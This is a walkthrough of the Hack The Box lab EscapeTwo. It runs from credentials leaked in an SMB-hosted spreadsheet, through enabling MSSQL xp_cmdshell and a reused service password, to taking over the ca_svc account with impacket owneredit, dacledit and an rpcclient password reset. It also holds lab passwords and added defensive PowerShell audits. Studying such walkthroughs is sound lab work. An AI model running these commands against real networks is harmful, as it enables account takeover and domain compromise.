Description
EscapeTwo is an easy Hack The Box machine that features the following vulnerabilities:
- Initial access using an assumed-breach scenario that leads to the discovery of an SMB share
- An SMB share containing a corrupted spreadsheet reveals the database administrator's credentials
- The database administrator can execute commands and read a file containing credentials
- The user has the WriteOwner permission over the Certification Authority account
- The Certification Authority user's password can be changed
- Privilege escalation through a vulnerability in a certificate template
Reconnaissance
First, we use the ping command to check whether the machine is up and which operating system it runs. The target machine's IP address is 10.129.241.157.
$ ping -c 3 10.129.241.157
PING 10.129.241.157 (10.129.241.157) 56(84) bytes of data.
64 bytes from 10.129.241.157: icmp_seq=1 ttl=127 time=53.8 ms
64 bytes from 10.129.241.157: icmp_seq=2 ttl=127 time=54.2 ms
64 bytes from 10.129.241.157: icmp_seq=3 ttl=127 time=53.2 ms
--- 10.129.241.157 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 53.226/53.739/54.216/0.405 ms
The machine is up, and a TTL of 127 (128 minus one hop) tells us it is a Windows machine. Next we run an Nmap TCP SYN port scan to find all open ports.
$ sudo nmap 10.129.241.157 -sS -oN nmap_scan
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.054s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds
We get many open ports, all related to an Active Directory environment.
Enumeration
Next we run a more thorough scan with service version detection and default scripts.
$ nmap 10.129.241.157 -Pn -sV -sC -p53,88,135,139,389,445,464,593,636,1433,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.241.157:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.241.157:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-09T13:11:12
|_Not valid after: 2055-01-09T13:11:12
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.53 seconds
We get the services of an Active Directory domain, specifically the domain controller DC01.sequel.htb. We add the hosts to our local /etc/hosts file.
$ echo "10.129.241.157 sequel.htb" | sudo tee -a /etc/hosts
$ echo "10.129.241.157 DC01.sequel.htb" | sudo tee -a /etc/hosts
As the assumed breach we have the credentials of the user rose with the password KxEPkKe6R8su, so we start by enumerating users and SMB shares.
$ netexec smb sequel.htb -u rose -p KxEPkKe6R8su --users --shares
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.241.157 445 DC01 [*] Enumerated shares
SMB 10.129.241.157 445 DC01 Share Permissions Remark
SMB 10.129.241.157 445 DC01 ----- ----------- ------
SMB 10.129.241.157 445 DC01 Accounting Department READ
SMB 10.129.241.157 445 DC01 ADMIN$ Remote Admin
SMB 10.129.241.157 445 DC01 C$ Default share
SMB 10.129.241.157 445 DC01 IPC$ READ Remote IPC
SMB 10.129.241.157 445 DC01 NETLOGON READ Logon server share
SMB 10.129.241.157 445 DC01 SYSVOL READ Logon server share
SMB 10.129.241.157 445 DC01 Users READ
SMB 10.129.241.157 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.241.157 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.129.241.157 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.129.241.157 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.129.241.157 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.129.241.157 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.129.241.157 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.129.241.157 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.129.241.157 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.129.241.157 445 DC01 ca_svc 2024-12-25 22:07:38 0
SMB 10.129.241.157 445 DC01 [*] Enumerated 9 local users: SEQUEL
We have read access to one share, Accounting Department, and the enumerated users are: Administrator, ryan, oscar, sql_svc, rose and ca_svc. Listing the share, we find two spreadsheets: accounting_2024.xlsx and accounts.xlsx. We download them.
$ smbclient '\\sequel.htb\Accounting Department' -U 'rose%KxEPkKe6R8su'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 12:52:21 2024
.. D 0 Sun Jun 9 12:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
6367231 blocks of size 4096. 849888 blocks available
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (34,9 KiloBytes/sec) (average 34,9 KiloBytes/sec)
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (23,1 KiloBytes/sec) (average 29,0 KiloBytes/sec)
If we try to open them, we find they are corrupted. Since an .xlsx file is a .zip archive, we extract accounts.xlsx and inspect its contents.
$ unzip accounts.xlsx -d accounts
Archive: accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: accounts/xl/workbook.xml
inflating: accounts/xl/theme/theme1.xml
inflating: accounts/xl/styles.xml
inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels
inflating: accounts/xl/worksheets/sheet1.xml
inflating: accounts/xl/sharedStrings.xml
inflating: accounts/_rels/.rels
inflating: accounts/docProps/core.xml
inflating: accounts/docProps/app.xml
inflating: accounts/docProps/custom.xml
inflating: accounts/[Content_Types].xml
The file accounts/xl/sharedStrings.xml contains the credentials for the users angela, oscar, kevin and sa.
$ xmllint --format accounts/xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
<si>
<t xml:space="preserve">First Name</t>
</si>
<si>
<t xml:space="preserve">Last Name</t>
</si>
<si>
<t xml:space="preserve">Email</t>
</si>
<si>
<t xml:space="preserve">Username</t>
</si>
<si>
<t xml:space="preserve">Password</t>
</si>
<si>
<t xml:space="preserve">Angela</t>
</si>
<si>
<t xml:space="preserve">Martin</t>
</si>
<si>
<t xml:space="preserve">angela@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">Oscar</t>
</si>
<si>
<t xml:space="preserve">Martinez</t>
</si>
<si>
<t xml:space="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">Kevin</t>
</si>
<si>
<t xml:space="preserve">Malone</t>
</si>
<si>
<t xml:space="preserve">kevin@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">NULL</t>
</si>
<si>
<t xml:space="preserve">sa@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
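The reason the strings can be read straight out of sharedStrings.xml is that the file is a de-duplicated string table; every cell of type "s" in the worksheet XML is just an index into it. The following is an added example, not code from the writeup, that rebuilds the table the way a spreadsheet reader does: resolving worksheet cells against the shared-string table rather than reading the string list top to bottom. Both XML fragments are constructed for the example (a trimmed version of the table above plus a sheet1.xml the writeup does not show); the repeated "NULL" entry shows why the sheet is needed, since one shared string can back several cells.

```powershell
# Added example, not part of the writeup: rebuild the table behind a damaged
# .xlsx from the two parts unzip still recovered. sharedStrings.xml is a
# de-duplicated string table; a cell in sheet1.xml with t="s" holds an index
# into it, so rows must be resolved through the sheet, not read off the string
# list (here "NULL" is one shared entry used by two cells of the same row).
# Both XML fragments are constructed for the example.

$sharedStringsXml = @'
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12" uniqueCount="11">
  <si><t>First Name</t></si>
  <si><t>Last Name</t></si>
  <si><t>Username</t></si>
  <si><t>Password</t></si>
  <si><t xml:space="preserve">Angela</t></si>
  <si><t xml:space="preserve">Martin</t></si>
  <si><t xml:space="preserve">angela</t></si>
  <si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>
  <si><t xml:space="preserve">NULL</t></si>
  <si><t xml:space="preserve">sa</t></si>
  <si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si>
</sst>
'@

$sheetXml = @'
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetData>
    <row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c><c r="C1" t="s"><v>2</v></c><c r="D1" t="s"><v>3</v></c></row>
    <row r="2"><c r="A2" t="s"><v>4</v></c><c r="B2" t="s"><v>5</v></c><c r="C2" t="s"><v>6</v></c><c r="D2" t="s"><v>7</v></c></row>
    <row r="3"><c r="A3" t="s"><v>8</v></c><c r="B3" t="s"><v>8</v></c><c r="C3" t="s"><v>9</v></c><c r="D3" t="s"><v>10</v></c></row>
  </sheetData>
</worksheet>
'@

function Get-SharedStrings {
    param([xml]$Sst)
    # InnerText concatenates every text node under <si>, which also covers
    # rich-text runs (<r><t>..</t></r>) that a plain .t lookup would miss.
    @($Sst.sst.si | ForEach-Object { $_.InnerText })
}

function ConvertFrom-SheetRows {
    param([xml]$Sheet, [string[]]$SharedStrings)
    foreach ($row in $Sheet.worksheet.sheetData.row) {
        $cells = foreach ($c in $row.c) {
            # t="s": <v> is a shared-string index; otherwise <v> is a literal
            # (numbers and dates are stored inline, never in sharedStrings.xml).
            if ($c.t -eq 's') { $SharedStrings[[int]$c.v] } else { $c.v }
        }
        ,@($cells)   # leading comma keeps each row an array on the pipeline
    }
}

function Get-SpreadsheetRecords {
    param([string]$SharedStringsXml, [string]$SheetXml)
    $strings = Get-SharedStrings -Sst ([xml]$SharedStringsXml)
    $rows    = @(ConvertFrom-SheetRows -Sheet ([xml]$SheetXml) -SharedStrings $strings)
    $header  = $rows[0]
    foreach ($r in $rows[1..($rows.Count - 1)]) {
        $record = [ordered]@{}
        for ($i = 0; $i -lt $header.Count; $i++) {
            $value = if ($i -lt $r.Count) { $r[$i] } else { $null }
            # Mask credential-looking columns: the finding is that the file
            # carries passwords at all, not their values.
            if ($header[$i] -match 'pass|pwd|secret') { $value = '*' * "$value".Length }
            $record[$header[$i]] = $value
        }
        [pscustomobject]$record
    }
}

Get-SpreadsheetRecords -SharedStringsXml $sharedStringsXml -SheetXml $sheetXml | Format-Table -AutoSize
```

For a real file, replace the two here-strings with Get-Content -Raw on accounts/xl/sharedStrings.xml and accounts/xl/worksheets/sheet1.xml after unzip has recovered them; the corrupted local header only affects the first archive entry, which is why the remaining parts inflate normally.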
sa is the local administrator of the Microsoft SQL Server database server and its password is MSSQLP@ssw0rd!. We can connect to the database and try to obtain remote command execution using the impacket-mssqlclient tool.
$ impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> xp_cmdshell whoami
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We cannot execute commands because the xp_cmdshell component is disabled.
Exploitation
We can enable the xp_cmdshell component with the enable_xp_cmdshell command. We can then execute commands as the user sequel\sql_svc.
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULL
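What enable_xp_cmdshell does under the hood is the two-step sp_configure change that the earlier error message hints at ('show advanced options', then 'xp_cmdshell', each followed by RECONFIGURE), and the resulting shell runs as the engine's service account, which is why whoami returns sequel\sql_svc. The following is an added example, not part of the writeup, showing the checks a DBA or defender would run against such an instance: whether xp_cmdshell is live, which logins can switch it on, and which Windows account the engine runs as. It uses the .NET SqlClient that ships with Windows PowerShell; the server name is assumed from the writeup's host and integrated authentication is assumed.

```powershell
# Added example, not part of the writeup: report the server state the attack
# chain above depends on. Server name and integrated auth are assumptions.

function Invoke-SqlQuery {
    param([string]$ConnectionString, [string]$Query)
    $conn = New-Object System.Data.SqlClient.SqlConnection $ConnectionString
    try {
        $conn.Open()
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $Query
        $table = New-Object System.Data.DataTable
        $table.Load($cmd.ExecuteReader())
        ,$table
    } finally {
        $conn.Close()
    }
}

function Get-SqlExposureReport {
    param([string]$Server = 'DC01.sequel.htb\SQLEXPRESS')
    $cs = "Server=$Server;Integrated Security=True;Encrypt=True;TrustServerCertificate=True"

    # 1. Surface-area switches. 'show advanced options' is what enable_xp_cmdshell
    #    flips first; value_in_use is the live setting after RECONFIGURE.
    $cfg = Invoke-SqlQuery $cs @"
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures')
"@

    # 2. Every sysadmin login can turn xp_cmdshell back on; list them.
    $sysadmins = Invoke-SqlQuery $cs @"
SELECT p.name, p.type_desc, p.is_disabled
FROM sys.server_principals AS p
WHERE IS_SRVROLEMEMBER('sysadmin', p.name) = 1
"@

    # 3. xp_cmdshell runs as the engine's service account. A domain account here
    #    (in the writeup, SEQUEL\sql_svc) turns a SQL compromise into a domain foothold.
    $svc = Invoke-SqlQuery $cs "SELECT servicename, service_account FROM sys.dm_server_services"

    [pscustomobject]@{
        Server            = $Server
        XpCmdShellEnabled = [bool](($cfg | Where-Object { $_.name -eq 'xp_cmdshell' }).value_in_use)
        AdvancedOptions   = [bool](($cfg | Where-Object { $_.name -eq 'show advanced options' }).value_in_use)
        SysadminLogins    = @($sysadmins | ForEach-Object { $_.name })
        ServiceAccounts   = @($svc | ForEach-Object { "$($_.servicename) -> $($_.service_account)" })
    }
}

function Disable-XpCmdShell {
    param([string]$Server = 'DC01.sequel.htb\SQLEXPRESS')
    $cs = "Server=$Server;Integrated Security=True;Encrypt=True;TrustServerCertificate=True"
    # The same sp_configure sequence enable_xp_cmdshell performs, in reverse.
    Invoke-SqlQuery $cs @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
"@ | Out-Null
}

Get-SqlExposureReport | Format-List
```

Disabling xp_cmdshell alone is not a fix: any sysadmin login (sa included) can re-enable it, so the report lists those logins so that a leaked sa password is treated as a host compromise, not a database one.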
Exploring the file system, we find a file, C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI, with database-related credentials. The password for the user sql_svc is WqSZAF6CysDQbGb3.
SQL (sa dbo@master)> xp_cmdshell dir C:\
output
----------------------------------------------------------
...
11/05/2022 11:03 AM <DIR> PerfLogs
01/04/2025 07:11 AM <DIR> Program Files
06/09/2024 07:37 AM <DIR> Program Files (x86)
06/08/2024 02:07 PM <DIR> SQL2019
06/09/2024 05:42 AM <DIR> Users
01/04/2025 08:10 AM <DIR> Windows
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019
output
...
06/08/2024 02:07 PM <DIR> .
06/08/2024 02:07 PM <DIR> ..
01/03/2025 07:29 AM <DIR> ExpressAdv_ENU
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019\ExpressAdv_ENU
output
---------------------------------------------------------------
...
01/03/2025 07:29 AM <DIR> .
01/03/2025 07:29 AM <DIR> ..
06/08/2024 02:07 PM <DIR> 1033_ENU_LP
09/24/2019 09:03 PM 45 AUTORUN.INF
09/24/2019 09:03 PM 788 MEDIAINFO.XML
06/08/2024 02:07 PM 16 PackageId.dat
06/08/2024 02:07 PM <DIR> redist
06/08/2024 02:07 PM <DIR> resources
09/24/2019 09:03 PM 142,944 SETUP.EXE
09/24/2019 09:03 PM 486 SETUP.EXE.CONFIG
06/08/2024 02:07 PM 717 sql-Configuration.INI
09/24/2019 09:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL
06/08/2024 02:07 PM <DIR> x64
...
SQL (sa dbo@master)> xp_cmdshell type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
output
-------------------------------------------------
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
...
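The INI above is an unattended-install answer file: SQL Server setup accepts SQLSVCPASSWORD and SAPWD on the command line or in such a file, and a copy left on the install media keeps them in plaintext for anyone who can read the directory. The following is an added example, not part of the writeup, that searches for setup answer files still carrying password parameters and reports who can read each one; the search roots are assumptions and the values are masked in the output.

```powershell
# Added example, not part of the writeup: find SQL Server setup answer files
# that still carry plaintext service or sa passwords, which is how the
# sql-Configuration.INI above leaked the sql_svc password. Search roots are
# assumptions; values are masked on output.

function Find-SqlSetupSecrets {
    param(
        [string[]]$Root    = @('C:\SQL2019', 'C:\Program Files\Microsoft SQL Server'),
        [string[]]$Include = @('*.ini', '*.txt', '*.cmd', '*.ps1')
    )
    # Setup parameters whose value is a password (sa plus each service account).
    $secretKeys = 'SAPWD', 'SQLSVCPASSWORD', 'AGTSVCPASSWORD', 'ASSVCPASSWORD',
                  'RSSVCPASSWORD', 'ISSVCPASSWORD', 'FTSVCPASSWORD'
    # Matches KEY="value" or KEY=value with a non-empty value; KEY="" is not a finding.
    $pattern = '^\s*(' + ($secretKeys -join '|') + ')\s*=\s*"?([^"\r\n]+?)"?\s*$'

    Get-ChildItem -Path $Root -Include $Include -Recurse -File -ErrorAction SilentlyContinue |
        Select-String -Pattern $pattern |
        ForEach-Object {
            $m = $_.Matches[0]
            # Who can read the file matters as much as what is in it: the writeup's
            # INI was readable by the low-privilege SQL service account.
            $readers = (Get-Acl -Path $_.Path).Access |
                Where-Object { $_.AccessControlType -eq 'Allow' -and "$($_.FileSystemRights)" -match 'Read|Modify|FullControl' } |
                ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
            [pscustomobject]@{
                File    = $_.Path
                Line    = $_.LineNumber
                Key     = $m.Groups[1].Value
                Value   = '*' * $m.Groups[2].Value.Length   # masked
                Readers = $readers -join ', '
            }
        }
}

Find-SqlSetupSecrets | Format-Table -AutoSize
```

A hit here means two things to fix: remove or restrict the file, and rotate the passwords it names, since the service account in this writeup was also reused by a domain user.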
Let's check whether the password is reused by another user on the network.
$ netexec smb sequel.htb -u users -p 'WqSZAF6CysDQbGb3'
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.241.157 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
The password is reused by the user ryan. Let's try to establish a remote session using the evil-winrm tool.
$ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
Evil-WinRM shell v3.6
...
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
We get a session as the user ryan.
Post-Exploitation
Let's use the PowerView tool to check for weaknesses in the domain ACLs.
$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
$ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
...
*Evil-WinRM* PS C:\Users\ryan\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\ryan\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceName -eq "ryan"}
ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-548670397-972687484-3496335370-1114
IdentityReferenceName : ryan
IdentityReferenceDomain : sequel.htb
IdentityReferenceDN : CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
IdentityReferenceClass : user
We find that the user ryan has the WriteOwner right over the user named Certification Authority.
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Get-DomainUser "CN=Certification Authority,CN=Users,DC=sequel,DC=htb"
logoncount : 0
badpasswordtime : 6/9/2024 10:14:40 AM
distinguishedname : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : Certification Authority
lastlogontimestamp : 6/9/2024 10:14:42 AM
userprincipalname : ca_svc@sequel.htb
name : Certification Authority
The user Certification Authority has the username ca_svc. With this access we can rewrite the owner of the ca_svc user to ryan and then change its password in order to operate as it. We rewrite the owner with the impacket-owneredit tool, change the ACL with the impacket-dacledit tool and change the password with the rpcclient tool.
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit.bak
[*] DACL modified successfully!
$ rpcclient -U 'sequel.htb/ryan%WqSZAF6CysDQbGb3' sequel.htb
rpcclient $> setuserinfo2 ca_svc 23 'new_password'
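The three commands above are one chain: WriteOwner lets ryan become the owner, the owner can always rewrite the DACL, and FullControl on the DACL covers the reset-password control right that setuserinfo2 level 23 exercises. The following is an added example, not part of the writeup, that audits sensitive accounts for exactly those conditions from the defender's side: a non-admin owner, and any ACE granting GenericAll, WriteOwner, WriteDacl, GenericWrite or the reset-password right to a principal outside the trusted set. It requires the ActiveDirectory module (RSAT), which also provides the AD: drive that Get-Acl reads; the trusted-principal list is an assumption to tune per domain, and the account names are the writeup's.

```powershell
# Added example, not part of the writeup: audit ownership and DACL of sensitive
# accounts for the edge abused above (ryan -> WriteOwner -> ca_svc).
# Requires the ActiveDirectory module; the trusted list is an assumption.

Import-Module ActiveDirectory

# Principals expected to control tier-0 and service accounts. Any other
# principal holding these rights is a finding.
$trusted = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Administrator',
             'SYSTEM', 'Account Operators', 'ENTERPRISE DOMAIN CONTROLLERS')

# Control-access right "User-Force-Change-Password" (reset without the old password).
$ForceChangePasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'

function Test-TrustedPrincipal {
    param([string]$Identity)            # 'SEQUEL\Domain Admins', 'NT AUTHORITY\SYSTEM', or a raw SID
    $trusted -contains ($Identity -split '\\')[-1]
}

function Get-DangerousAccountAces {
    param([string[]]$SamAccountName)
    foreach ($sam in $SamAccountName) {
        $user = Get-ADUser -Identity $sam
        $acl  = Get-Acl -Path "AD:\$($user.DistinguishedName)"

        # The owner can always rewrite the DACL, so a non-admin owner is a finding
        # in itself. impacket-owneredit changed this from Domain Admins to ryan.
        if (-not (Test-TrustedPrincipal $acl.Owner)) {
            [pscustomobject]@{ Account = $sam; Principal = $acl.Owner; Right = 'Owner'; ObjectType = $null }
        }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            if (Test-TrustedPrincipal $who) { continue }
            $rights = $ace.ActiveDirectoryRights.ToString()

            # Rights that lead to account takeover: full control, ownership, DACL
            # rewrite (impacket-dacledit), generic write, or the reset-password
            # control right (what setuserinfo2 level 23 exercises). ExtendedRight
            # with an empty ObjectType means every control-access right.
            $dangerous = $rights -match 'GenericAll|WriteOwner|WriteDacl|GenericWrite'
            if ($rights -match 'ExtendedRight' -and
                ($ace.ObjectType -eq $ForceChangePasswordGuid -or $ace.ObjectType -eq [guid]::Empty)) {
                $dangerous = $true
            }
            if ($dangerous) {
                [pscustomobject]@{ Account = $sam; Principal = $who; Right = $rights; ObjectType = $ace.ObjectType }
            }
        }
    }
}

Get-DangerousAccountAces -SamAccountName 'ca_svc', 'sql_svc' | Format-Table -AutoSize
```

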